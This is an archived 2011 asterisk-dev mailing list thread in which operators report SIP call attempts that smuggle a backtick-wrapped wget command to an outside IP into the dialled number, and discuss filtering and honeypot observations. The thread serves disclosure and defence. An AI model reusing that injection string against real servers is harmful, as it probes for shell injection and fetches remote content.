[asterisk-dev] A new kind of SIP attack ?

Jeff LaCoursiere jeff at sunfone.com
Mon Sep 12 07:28:48 CDT 2011



On Mon, 12 Sep 2011, Tom Browning wrote:

> On Mon, Sep 12, 2011 at 4:47 AM, Olle E. Johansson <oej at edvina.net> wrote:
>>
>> 12 sep 2011 kl. 10:39 skrev Pavel Troller:
>>
>>> Hi!
>>>  Since yesterday, I can see strange "call attempts" coming to my
>>> switches over SIP to destinations like this:
>>>  00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`
>>>  I tried to wget the file manually and it was successful, but it was
>>> empty (zero size).
>>>  I'm just informing about something which may be a new kind of hacking
>>> attempt. I hope that Asterisk doesn't perform backtick expansion during
>>> processing of the called number, but I'm writing it there to be sure
>>> that a developer's eye will look at this and confirm it.
>>>  With regards,
>>>    Pavel Troller
>>>
>>
>> Just wanted to add that the best current practise we added to the README files earlier apply here as well. If your diaplan ONLY has numeric extensions, filter out all the rest on incoming calls.
>>
>> /O
>
>
> I saw (and reported on asterisk-users) the same URI attempts last
> night on a server configured to be a "honeypot" of sorts (Asterisk 10
> that accepts all calls via UDP 5060 and dumps them into a single
> Asterisk 10 conference bridge :-) ... works great)
>
> FWIW, the call attempts must be coming from a real SIP server as I
> found two of the calls sitting in my conference bridge!
>
> I would bet that this shell injection scan has its roots in a
> discovery that a common SIP server configuration or framework is
> subject to shell injection and this how they are going to find those
> servers for further attack via shell injection.
>
> Tom
>

Would be interesting to let your honeypot accept the request and perform 
the wget, and see what happens next...

j


More information about the asterisk-dev mailing list